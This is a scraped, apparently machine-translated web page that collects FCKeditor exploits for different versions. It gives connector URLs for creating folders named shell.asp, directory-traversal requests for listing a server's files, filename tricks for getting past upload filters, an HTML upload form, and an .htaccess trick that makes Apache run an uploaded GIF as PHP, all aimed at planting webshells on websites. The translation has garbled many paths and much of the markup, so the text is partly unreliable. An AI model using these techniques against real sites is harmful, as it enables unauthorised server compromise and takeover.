Summary of FCKeditor exploit exploits

Source: Internet
Author: User

Summary of FCKeditor exploit exploits
View Editor versions
Editor/filemanager/browser/default/browser.html? Connector=. /.. /connectors/cfm/connector.cfm


Fckeditor/editor/filemanager/connectors/asp/connector.asp? Command=createfolder&type=image&currentfolder=/qing.asp&newfoldername=qing.asp after the/up_files/image/ Directory to create a plain text qing.asp folder.

A.ASPX.A;. A.aspx.jpg. Jpg

PHP file name plus a question mark, successful upload parsing

Support for PHP kill, 2.6.4 and 2.6.5 test failed

Fckeditor/editor/plugins/bbcode/_sample/sample.html 2.64

2. Version 2.2
Apache+linux environment in the upload file after adding a. Break! Test passed.

3.Version <=2.4.2 for PHP in the processing of PHP upload does not have the media type of upload file type control, causing users to upload arbitrary files! Save the following as an HTML file and modify the action address.
<form id= "Frmupload" enctype= "Multipart/form-data"
Action= " Type=media "method=" POST ">upload a new file:<br>
<input type= "File" Name= "NewFile" size= "><br>"
<input id= "Btnupload" type= "Submit" value= "Upload" >

4.FCKeditor file Upload "." How to bypass the "_" Underline
Many times uploaded files such as: Shell.php.rar or shell.php;. JPG will change to shell_php;. JPG This is the change of the new FCK.
4.1: Commit shell.php+ Space Bypass
However the space only supports the win system *nix is not supported [shell.php and shell.php+ spaces are 2 different files not tested.
4.2: Continue uploading the same name file can be changed to shell.php; (1). jpg can also create a new folder, only the first level of the directory is detected, if you skip to level two directory is unrestricted.

5. Create a breakthrough folder
Fckeditor/editor/filemanager/connectors/asp/connector.asp? command=createfolder&type=image&currentfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? Command=createfolder&currentfolder=/&type=image&newfoldername=shell.asp

6. Upload address of test file in FCKeditor

7. Common Upload Address
Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? command=getfoldersandfiles&type=image&currentfolder=/
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/asp/ Connector.asp
Fckeditor/editor/filemanager/browser/default/browser.html? type=image&connector= 2fconnector.php (ver:2.6.3 test pass)
JSP version:
Fckeditor/editor/filemanager/browser/default/browser.html? type=image&connector=connectors/jsp/connector.jsp
Note that the Red section is modified to fckeditor the actual scripting language used, and the blue section can be customized
The folder name can also be used. /.. Directory traversal, the purple part is the actual website address.

8. Other Upload Address
Generally many sites have been deleted _samples directory, you can try.
Fckeditor/editor/fckeditor.html can not upload files, you can click the Upload image button and then select Browse Server to jump to the upload file page.

9. Listing vulnerabilities can also help to find the upload address
Version 2.4.1 Test Passed
Modify the CurrentFolder parameter using: /.. /To enter a different directory
/browser/default/connectors/aspx/connector.aspx? Command=createfolder&type=image&currentfolder=. /.. /.. %2f&newfoldername=shell.asp
Depending on the XML information returned, you can view all the directories in the site.
Fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx? command=getfoldersandfiles&type=image&currentfolder=%2f
You can also browse the drive letter directly:
JSP version:
Fckeditor/editor/filemanager/browser/default/connectors/jsp/connector? command=getfoldersandfiles&type=&currentfolder=%2f

10. Explode Path Vulnerability
Fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx? Command=getfoldersandfiles&type=file&currentfolder=/shell.asp

One. FCKeditor of the filtering problem caused by passive restriction strategy
Impact version: FCKeditor x.x <= FCKeditor v2.4.3
Vulnerability Description:
The file category in FCKeditor v2.4.3 rejects the upload type by default:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi| Htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 allows uploading of the ASA, CER, PHP2, PhP4, Inc, PWML, PHT suffix file after uploading it to save files directly with $sfilepath = $sServerDir. $sFileName, instead of using $sextension as the suffix. Direct result in Win under the upload file after adding a. To break through [not tested]!
In Apache, because "Apache file name resolution flaw vulnerability" can also be exploited, and other upload vulnerabilities are recommended to define the type variable when using the file category to upload files, according to the FCKeditor code, the limit is the most narrow.
It is good to have a script file uploaded at the time of uploading, but some versions may not be able to upload directly can be used after the file name plus. dot or space bypass, you can also use 2003 parsing vulnerability to establish xxx.asp folder or upload xx.asp; Jpg!

12. The oldest loophole, the type file has no limitations!
I was exposed to the first fckeditor loophole. The version is unknown, it should be very old, because the program does not check the type of type=xxx. We can directly construct the upload to change the type=image to Type=hsren so you can create a folder called Hsren, a new type, without any restrictions, you can upload any script!

=============================================================================================================== ================================

FCK Editor JSP version vulnerability:

Http:// command=fileupload&type=image&currentfolder=%2f

Upload your horse's catalogue

Editor/filemanager/browser/default/connectors/jsp/connector? Command=getfoldersandfiles&type=. /.. /&currentfolder=/

Upload the address of the shell:
Http:// Type=image&connector=connectors/jsp/connector
It has to do with the version. Not hundred percent success. Test several stations successfully.
I can't kill him.
Http://www.****.com/fckeditor/editor/filemanager/browser/default/browser.html?type=file&connector= Connectors/jsp/connector
If the above address is not possible, try it.
Fckeditor/editor/filemanager/browser/default/browser.html? Type=image&connector=/servlet/connector

/fckeditor/editor/filemanager/browser/default/browser.html? Type=image& %2fphp%2fconnector.php

In the Name of GOD
[+] Title:fckeditor all Versian arbitrary File Upload Vulnerability
[+] script:
[+] Website:PenTesters.IR
1. Create a htaccess file:
<filesmatch "_php.gif" >
SetHandler application/x-httpd-php

2. Upload the htaccess via FC
3.Now upload shell.php.gif with FCKeditor.
4.After upload Shell.php.gif, the name "Shell.php.gif" to "shell_php.gif" automatically.
6.Now shell is available from server.

All understand, use htaccess make Apache will _php.gif parse ...


Summary of FCKeditor exploit exploits

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.